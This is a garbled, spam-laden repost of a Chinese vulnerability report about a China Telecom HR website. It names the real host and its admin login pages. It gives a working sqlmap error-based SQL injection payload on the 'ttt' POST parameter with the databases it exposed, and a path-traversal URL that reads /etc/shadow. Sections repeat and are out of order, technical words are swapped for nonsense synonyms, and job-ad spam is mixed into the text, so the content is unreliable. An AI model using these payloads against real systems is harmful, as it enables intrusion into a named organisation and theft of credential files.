「有没有网上兼职」中国电信某站SQL注入+文件包罗裂痕

摘 要

靠山二:https://rs.hntelecom.net.cn/loginadmin.do?m=login 靠山一:https://rs.hntelecom.net.cn/HRSystem/initIndex.do sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: tttTy

 


靠山二:https://rs.hntelecom.net.cn/loginadmin.do?m=login

靠山一:https://rs.hntelecom.net.cn/HRSystem/initIndex.do
 

「有没有网上兼职」中国电信某站SQL注入+文件包含裂痕



sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: ttt Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: sss=1&Submit=�� ��&ttt=1' AND (SELECT 7373 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,108,100,58),(SELECT (CASE WHEN (7373=7373) THEN 1 ELSE 0 END)),CHAR(58,111,112,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'JyFl'='JyFl --- available databases [4]: [*] information_schema [*] manpower [*] test [*] yiqilaifinddifferences

中国电信某站SQL注入+文件包罗裂痕

地点:rs.hntelecom.net.cn/search.do?m=search
文件包罗:rs.hntelecom.net.cn/filedown.do?m=filedown&path=http://www.2cto.com/../..//../..//../..//../..//../..//etc/shadow%00

看到没有,root权限的哦



 

裂痕范例二:
裂痕范例一:
话说2个地点都是一样成果,搞出2个有意思吗
post数据:sss=test&Submit=%cb%d1%20%cb%f7&ttt=test


修复方案:

不继承深入,存在进一步渗透风险。
post数据:sss=test&Submit=%cb%d1%20%cb%f7&ttt=test
 



地点:rs.hntelecom.net.cn/searchD.do?m=searchD

,开什么网店最赚钱